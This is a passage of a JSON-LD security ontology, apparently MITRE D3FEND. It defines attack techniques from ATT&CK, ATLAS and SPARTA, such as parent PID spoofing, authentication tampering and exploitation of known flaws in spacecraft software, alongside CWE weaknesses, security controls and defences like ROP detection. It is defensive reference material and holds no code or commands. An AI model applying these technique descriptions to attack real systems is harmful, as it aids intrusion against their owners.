      "@type": "owl:Class",
      "d3f:attack-id": "T1502",
      "d3f:definition": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1134.004",
      "rdfs:label": "Parent PID Spoofing",
      "rdfs:seeAlso": {
        "@id": "d3f:T1134.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:ST0001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to gather information they can use to plan future operations.",
      "d3f:display-order": 1,
      "rdfs:label": "Reconnaissance - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Reconnaissance"
    },
    {
      "@id": "d3f:CWE-336",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-336",
      "d3f:definition": "A Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized.",
      "rdfs:label": "Same Seed in Pseudo-Random Number Generator (PRNG)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-335"
      }
    },
    {
      "@id": "d3f:CCI-000044_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces the organization-defined limit of consecutive invalid logon attempts by a user during the organization-defined time period.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000044"
    },
    {
      "@id": "d3f:OTReadValueCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reads the contents of the specified number of consecutive parameter area words starting from the specified word.",
      "d3f:has-participant": {
        "@id": "d3f:OTLogicVariable"
      },
      "rdfs:comment": [
        "BACnet: confirmedCOVNotification\nBACnet: subscribeCOV\nBACnet: readProperty\nBACnet: readPropertyConditional\nBACnet: readPropertyMultiple\nBACnet: unconfirmedCOVNotification\nBACnet: readRange\nBACnet: subscribeCOVProperty\nBACnet: getEventInformation\nBACnet: subscribe-cov-property-multiple\nBACnet: confirmed-cov-notification-multiple\nBACnet: unconfirmed-cov-notification-multiple ",
        "CIP: Get Attributes All\nCIP: Get Attribute List\nCIP: Get Attribute Single\nCIP: Find Next Object Instance\nCIP: Get Member ",
        "GE-SRTP: READ SYSTEM MEMORY\nGE-SRTP: READ TASK MEMORY ",
        "Modbus: Read Coils\nModbus: Read Discrete Inputs\nModbus: Read Holding Registers\nModbus: Read Input Registers\nModbus: Read FIFO Queue"
      ],
      "rdfs:label": "OT Read Value Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTReadCommand"
        },
        {
          "@id": "_:N8350373b6ef1483ba858507e4c4ec4ed"
        }
      ]
    },
    {
      "@id": "_:N8350373b6ef1483ba858507e4c4ec4ed",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "d3f:SystemSoftware",
      "@type": "owl:Class",
      "d3f:definition": "Computer software which enables operating system or platform functionality.",
      "rdfs:label": "System Software",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:EX-0009.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0009.03",
      "d3f:definition": "Using knowledge of the software composition on-board, the adversary maps components and versions to publicly or privately known defects and then crafts inputs to trigger them. Typical targets include standard libraries (libc, STL), cryptographic and compression libraries, protocol stacks (CCSDS implementations, IP over space links, SpaceWire bridges), filesystems and parsers (FITS/CCSDS packetization, custom table formats), and vendor SDKs for radios, sensors, or payloads. Triggers arrive as well-formed but malicious packets, frames, or files whose edge-case fields exercise version-specific bugs, overflowing a parser, bypassing an authentication check, or causing a kernel/driver fault that reboots into a more permissive mode. Because these flaws are documented somewhere, exploitation emphasizes matching the exact build and build-time options used on the mission.",
      "rdfs:label": "Known Vulnerability (COTS/FOSS) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0009/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0009"
      },
      "skos:prefLabel": "Known Vulnerability (COTS/FOSS)"
    },
    {
      "@id": "d3f:REC-0006.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0006.01",
      "d3f:definition": "Threat actors enumerate the exact environment used to produce flight builds: IDEs and plugins, cross-compilers and SDKs, container images/VMs, environment variables, path conventions, build systems, static libraries, and private package registries. They correlate repository layouts (mono- vs multi-repo), branch and review policies, protected branches/tags, and CI orchestrators to find where policy gaps allow unreviewed code or tool updates. Secrets embedded in configs (tokens, service accounts), permissive compiler/linker flags, or disabled hardening options are especially valuable. Knowledge of debug/diagnostic builds, symbol servers, and crash-dump handling lets an adversary reconstruct higher-fidelity testbeds or derive function boundaries in stripped images.",
      "rdfs:label": "Development Environment - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0006/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0006"
      },
      "skos:prefLabel": "Development Environment"
    },
    {
      "@id": "d3f:M1025",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:BootloaderAuthentication"
        },
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:ProcessSegmentExecutionPrevention"
        },
        {
          "@id": "d3f:SystemCallFiltering"
        }
      ],
      "rdfs:label": "Privileged Process Integrity"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-24_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Control Decisions | No User or Process Identity",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "AC-24(2)"
    },
    {
      "@id": "d3f:IndirectBranchCallAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IndirectBranchCallAnalysis"
      ],
      "d3f:d3fend-id": "D3-IBCA",
      "d3f:definition": "Analyzing vendor specific branch call recording in order to detect ROP style attacks.",
      "d3f:kb-article": "## How it works\n\nThis technique is used to detect an attacker attempting to exploit and execute code on a target system's call stack using return-oriented programming (ROP). Modern processors that have the ability to maintain a list of the branching calls, e.g., Intel's Last Branch Recording (LBR), can be used to track and analyze indirect branching calls that are indicative of malicious activity.\n\nIn order to reduce the number of indirect branch calls to analyze to a manageable set it is assumed that malicious ROP activity will involve the use of system calls.  The technique observes indirect branch calls that are part of paths that lead to system calls; all others are ignored. Branching calls chained together are often referred to as gadgets, and gadgets are often used in ROP attacks. Indirect branch calls that involve a transfer from user-space to kernel-space are of interest for this technique.\n\nIdentification of potential ROP exploit execution includes:\n\n- Inspecting the LBR when a system function call is made\n\n  - The LBR is configured to return only instructions of interest (ret, indirect jmp, indirect calls)\n\n\n- Behavior is analyzed for\n  - Ret instructions that appear to target areas not preceded by the call sites\n  - Sequences of small code fragments that appear to be chained through the indirect branching calls (gadgets)\n\n\n- Of interest are returns that appear to not render control back after calls\n  - Typical ret-call are paired\n  - gadgets will appear to have ret followed by instruction of next instruction of the following gadget\n\n\n## Considerations\n\n* May be operating system dependent since specific system calls are used to scope branching behavior\n* Processors need to support access to a Last Branch Recording list feature\n* The size of the LBR stack can limit the expected size of the analyzed execution stack\n* If processor does not support LBR then overhead costs for the analysis can be significant",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-IndirectBranchingCalls"
      },
      "rdfs:label": "Indirect Branch Call Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:ProcessAnalysis"
      }
    },
    {
      "@id": "d3f:IntranetFileTransferTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet file transfer traffic is file transfer traffic that does not cross a given network's boundaries and uses a standard file transfer protocol.",
      "rdfs:label": "Intranet File Transfer Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:File_transfer"
        },
        {
          "@id": "dbr:Intranet"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileTransferNetworkTraffic"
        },
        {
          "@id": "d3f:IntranetNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:EventLogEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the event logging service is enabled, allowing it to actively collect and record logs.",
      "rdfs:label": "Event Log Enable Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:T1430.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1430.001",
      "d3f:definition": "An adversary may use access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM)/mobile device management (MDM) server console to track the location of mobile devices managed by the service.(Citation: Krebs-Location)",
      "rdfs:label": "Remote Device Management Services - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1430"
      },
      "skos:prefLabel": "Remote Device Management Services"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SC-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "d3f:NetworkIsolation"
        }
      ],
      "d3f:control-name": "Security Function Isolation",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SC-3"
    },
    {
      "@id": "d3f:T0893",
      "@type": "owl:Class",
      "d3f:attack-id": "T0893",
      "d3f:definition": "Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes.",
      "rdfs:label": "Data from Local System - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Data from Local System"
    },
    {
      "@id": "d3f:IntranetRPCNetworkTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Intranet RPC network traffic is network traffic that does not cross a given network's boundaries and uses a standard remote procedure call (e.g., RFC 1050) protocol.",
      "rdfs:label": "Intranet RPC Network Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Intranet"
        },
        {
          "@id": "dbr:Remote_procedure_call"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IntranetNetworkTraffic"
        },
        {
          "@id": "d3f:RPCNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:AnswerSetProgramming",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ASP",
      "d3f:definition": "Answer set programming is a form of declarative programming based on the stable model (answer set) semantics of logic programming.",
      "d3f:kb-article": "## How it works\nAnswer set programming (ASP) is oriented towards difficult (primarily NP-hard) search problems. The computational process employed in the design of many answer set solvers is an enhancement of the DPLL algorithm and, in principle, it always terminates (unlike Prolog query evaluation, which may lead to an infinite loop).\n\nIn a more general sense, ASP includes all applications of answer sets to knowledge representation and the use of Prolog-style query evaluation for solving problems arising in these applications.\n\n## References\n1. Answer set programming. (2023, April 27). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Answer_set_programming)",
      "d3f:synonym": "ASP",
      "rdfs:label": "Answer Set Programming",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicProgramming"
      }
    },
    {
      "@id": "d3f:NetworkDirectoryResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Directory"
      },
      "d3f:definition": "A directory resource made available from one host to other hosts on a computer network.",
      "rdfs:label": "Network Directory Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkFileShareResource"
        },
        {
          "@id": "_:N176f9fda19114c7eb8614a77975dd1f3"
        }
      ]
    },
    {
      "@id": "_:N176f9fda19114c7eb8614a77975dd1f3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Directory"
      }
    },
    {
      "@id": "d3f:CWE-579",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-579",
      "d3f:definition": "The product stores a non-serializable object as an HttpSession attribute, which can hurt reliability.",
      "rdfs:label": "J2EE Bad Practices: Non-serializable Object Stored in Session",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:CWE-657",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-657",
      "d3f:definition": "The product violates well-established principles for secure design.",
      "rdfs:label": "Violation of Secure Design Principles",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-1039",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1039",
      "d3f:definition": "The product uses an automated mechanism such as machine learning to recognize complex data inputs (e.g. image or audio) as a particular concept or category, but it does not properly detect or handle inputs that have been modified or constructed in a way that causes the mechanism to detect a different, incorrect concept.",
      "rdfs:label": [
        "Automated Recognition Mechanism with Inadequate Detection or Handling of Adversarial Input Perturbations",
        "Inadequate Detection or Handling of Adversarial Input Perturbations in Automated Recognition Mechanism"
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-693"
        },
        {
          "@id": "d3f:CWE-697"
        }
      ]
    },
    {
      "@id": "d3f:InputFunction",
      "@type": "owl:Class",
      "d3f:definition": "Generic function that receives input from an untrusted source.",
      "rdfs:label": "Input Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:AML.T0025",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0025",
      "d3f:definition": "Adversaries may exfiltrate AI artifacts or other information relevant to their goals via traditional cyber means.\n\nSee the ATT&CK [Exfiltration](https://attack.mitre.org/tactics/TA0010/) tactic for more information.",
      "rdfs:label": "Exfiltration via Cyber Means - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0025"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "Exfiltration via Cyber Means"
    },
    {
      "@id": "d3f:T1556",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1556",
      "d3f:definition": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
      "d3f:modifies": {
        "@id": "d3f:AuthenticationService"
      },
      "rdfs:label": "Modify Authentication Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N99c3942035f345df9bf73ad0cdc96985"
        }
      ]
    },
    {
      "@id": "_:N99c3942035f345df9bf73ad0cdc96985",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "d3f:HardwareClock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A clock implemented using physical electronic components, typically providing timekeeping independent of system power or software state.",
      "rdfs:label": "Hardware Clock",
      "rdfs:seeAlso": {
        "@id": "https://linux.die.net/man/8/clock"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Clock"
        },
        {
          "@id": "d3f:HardwareDevice"
        }
      ]
    },
    {
      "@id": "d3f:AML.TA0001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0001",
      "d3f:definition": "The adversary is leveraging their knowledge of and access to the target system to tailor the attack.\n\nAI Attack Staging consists of techniques adversaries use to prepare their attack on the target AI model.\nTechniques can include training proxy models, poisoning the target model, and crafting adversarial data to feed the target model.\nSome of these techniques can be performed in an offline manner and are thus difficult to mitigate.\nThese techniques are often used to achieve the adversary's end goal.",
      "rdfs:label": "AI Attack Staging - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "AI Attack Staging"
    },
    {
      "@id": "d3f:T1136.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1136.003",
      "d3f:creates": {
        "@id": "d3f:CloudUserAccount"
      },
      "d3f:definition": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)",
      "rdfs:label": "Cloud Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1136"
        },
        {
          "@id": "_:N31856ab35c6649db85380c6f742ac6ff"
        }
      ]
    },
    {
      "@id": "_:N31856ab35c6649db85380c6f742ac6ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudUserAccount"
      }
    },
    {
      "@id": "d3f:d3fend-kb-annotation-property",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x d3fend-kb-annotation-property y: The entity x had the d3fend kb annotation y.",
      "rdfs:label": "d3fend-kb-annotation-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:OffensiveAction",
      "@type": "owl:Class",
      "rdfs:label": "Offensive Action",
      "rdfs:subClassOf": {
        "@id": "d3f:CyberAction"
      }
    },
    {
      "@id": "d3f:T1144",
      "@type": "owl:Class",
      "d3f:attack-id": "T1144",
      "d3f:definition": "In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.apple.quarantine</code>. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1553.001",
      "rdfs:label": "Gatekeeper Bypass",
      "rdfs:seeAlso": {
        "@id": "d3f:T1553.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:ClockEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving a clock artifact, characterized by changes to or readings from a timekeeping mechanism that maintains a representation of temporal progression.",
      "rdfs:label": "Clock Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N867e5d22944e4cc88fe0d8480caa95ac"
        }
      ]
    },
    {
      "@id": "_:N867e5d22944e4cc88fe0d8480caa95ac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Clock"
      }
    },
    {
      "@id": "d3f:T1475",
      "@type": "owl:Class",
      "d3f:attack-id": "T1475",
      "d3f:definition": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Deliver Malicious App via Authorized App Store - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Deliver Malicious App via Authorized App Store"
    },
    {
      "@id": "d3f:Perturbation-basedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PBL",
      "d3f:definition": "Perturbation based methods are proposed under the smoothness assumption, which indicates that two data points close to each other in feature space are likely to have the same label.",
      "d3f:kb-article": "## References\nZheng, Y., & Song, Y. (2021). An Effective Perturbation-Based Semi-Supervised Learning Method for Acoustic Event Classification. IEEE/ACM Transactions on Audio, Speech, and Language Processing, 29, 3580-3591. [Link](https://www.semanticscholar.org/paper/An-Effective-Perturbation-Based-Semi-Supervised-for-Zheng-Song/b75ae37d137ac354eb2ed42917e461b4dccdc977).\n\nEngelen, S., & Hoos, H. (2020). A survey on semi-supervised learning. Machine Learning, 109(2), 299-337. [Link](https://link.springer.com/article/10.1007/s10994-019-05855-6).",
      "rdfs:label": "Perturbation-based Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:IntrinsicallySemi-supervisedLearning"
      }
    },
    {
      "@id": "d3f:CCI-001556_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely authenticates destination domains for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-11T00:00:00"
      },
      "rdfs:label": "CCI-001556"
    },
    {
      "@id": "d3f:AML.T0044",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0044",
      "d3f:definition": "Adversaries may gain full \"white-box\" access to an AI model.\nThis means the adversary has complete knowledge of the model architecture, its parameters, and class ontology.\nThey may exfiltrate the model to [Craft Adversarial Data](/techniques/AML.T0043) and [Verify Attack](/techniques/AML.T0042) in an offline setting where it is hard to detect their behavior.",
      "rdfs:label": "Full AI Model Access - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0044"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIModelAccessTechnique"
      },
      "skos:prefLabel": "Full AI Model Access"
    },
    {
      "@id": "d3f:T1628.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1628.002",
      "d3f:definition": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device.",
      "rdfs:label": "User Evasion - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1628"
      },
      "skos:prefLabel": "User Evasion"
    },
    {
      "@id": "d3f:CWE-1290",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1290",
      "d3f:definition": "The product implements a decoding mechanism to decode certain bus-transaction signals to security identifiers. If the decoding is implemented incorrectly, then untrusted agents can now gain unauthorized access to the asset.",
      "rdfs:label": "Incorrect Decoding of Security Identifiers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:DynamicAnalysisTool",
      "@type": "owl:Class",
      "d3f:definition": "Dynamic program analysis is the analysis of computer software that is performed by executing programs on a real or virtual processor.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Dynamic_program_analysis"
      },
      "rdfs:label": "Dynamic Analysis Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:CodeAnalyzer"
      }
    },
    {
      "@id": "d3f:T1069.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1069.003",
      "d3f:definition": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.",
      "rdfs:label": "Cloud Groups",
      "rdfs:subClassOf": {
        "@id": "d3f:T1069"
      }
    },
    {
      "@id": "d3f:OffensiveTactic",
      "@type": "owl:Class",
      "d3f:definition": "Per ATT&CK, these are defined as Tactical Goals, not Tactics per se. Many children also fit the definition of tactics.  Some are neither tactics nor tactical goals really (e.g., Execution, which is a useful grouping, but an action, not really a tactic or technique).",
      "d3f:synonym": "Tactical Objective",
      "rdfs:isDefinedBy": {
        "@id": "https://attack.mitre.org/docs/ATTACK_Design_and_Philosophy_March_2020.pdf"
      },
      "rdfs:label": "Offensive Tactic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Goal"
        },
        {
          "@id": "_:Ne894e9f6c10d4282adcebb19165230e6"
        }
      ]
    },
    {
      "@id": "_:Ne894e9f6c10d4282adcebb19165230e6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enabled-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OffensiveTechnique"
      }
    },
    {
      "@id": "d3f:AML.T0002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0002",
      "d3f:definition": "Adversaries may search public sources, including cloud storage, public-facing services, and software or data repositories, to identify AI artifacts.\nThese AI artifacts may include the software stack used to train and deploy models, training and testing data, model configurations and parameters.\nAn adversary will be particularly interested in artifacts hosted by or associated with the victim organization as they may represent what that organization uses in a production environment.\nAdversaries may identify artifact repositories via other resources associated with the victim organization (e.g. [Search Victim-Owned Websites](/techniques/AML.T0003) or [Search Open Technical Databases](/techniques/AML.T0000)).\nThese AI artifacts often provide adversaries with details of the AI task and approach.\n\nAI artifacts can aid in an adversary's ability to [Create Proxy AI Model](/techniques/AML.T0005).\nIf these artifacts include pieces of the actual model in production, they can be used to directly [Craft Adversarial Data](/techniques/AML.T0043).\nAcquiring some artifacts requires registration (providing user details such as email/name), AWS keys, or written requests, and may require the adversary to [Establish Accounts](/techniques/AML.T0021).\n\nArtifacts might be hosted on victim-controlled infrastructure, providing the victim with some information on who has accessed that data.",
      "rdfs:label": "Acquire Public AI Artifacts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Acquire Public AI Artifacts"
    },
    {
      "@id": "d3f:T1574",
      "@type": "owl:Class",
      "d3f:attack-id": "T1574",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.",
      "rdfs:label": "Hijack Execution Flow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1389",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1389",
      "d3f:definition": "The product parses numeric input assuming base 10 (decimal) values, but it does not account for inputs that use a different base number (radix).",
      "rdfs:label": "Incorrect Parsing of Numbers with Different Radices",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-704"
      }
    },
    {
      "@id": "d3f:WebAuthentication",
      "@type": "owl:Class",
      "d3f:definition": "A request-response comprising a user credential presentation to a system and a verification response where the verifying party is a web server.",
      "rdfs:label": "Web Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Authentication"
        },
        {
          "@id": "_:Nbd9fcfb4449e46ec9906c83412137f44"
        }
      ]
    },
    {
      "@id": "_:Nbd9fcfb4449e46ec9906c83412137f44",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SessionCookie"
      }
    },
    {
      "@id": "d3f:Person",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A person is a human being.",
      "rdfs:label": "Person",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Agent"
        },
        {
          "@id": "_:N723fb6f204e54b14bfdbb68391ddc86c"
        }
      ]
    },
    {
      "@id": "_:N723fb6f204e54b14bfdbb68391ddc86c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:name"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
